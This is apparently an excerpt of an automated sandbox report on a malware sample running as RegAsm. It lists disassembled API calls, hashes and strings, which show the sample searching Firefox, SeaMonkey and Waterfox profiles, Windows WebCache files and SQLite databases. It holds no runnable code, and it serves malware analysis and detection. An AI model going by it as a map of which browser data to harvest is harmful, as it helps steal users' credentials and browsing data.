                                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                • API String ID: 4039892925-11920434
                                                                                                                                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                • API String ID: 4039892925-2068335096
                                                                                                                                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                • API String ID: 4039892925-3369679110
                                                                                                                                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                • API String ID: 3510742995-2641926074
                                                                                                                                                                                                • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateErrorFileLastfree
                                                                                                                                                                                                • String ID: |A
                                                                                                                                                                                                • API String ID: 981974120-1717621600
                                                                                                                                                                                                • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                • String ID: $0.@
                                                                                                                                                                                                • API String ID: 2758756878-1896041820
                                                                                                                                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                • API String ID: 1534475566-1174173950
                                                                                                                                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 669240632-0
                                                                                                                                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                • API String ID: 2925649097-2036018995
                                                                                                                                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                • String ID: "%s"
                                                                                                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2911713577-0
                                                                                                                                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModuleProcessTimes
                                                                                                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                • API String ID: 116129598-3385500049
                                                                                                                                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                • API String ID: 2887208581-2114579845
                                                                                                                                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
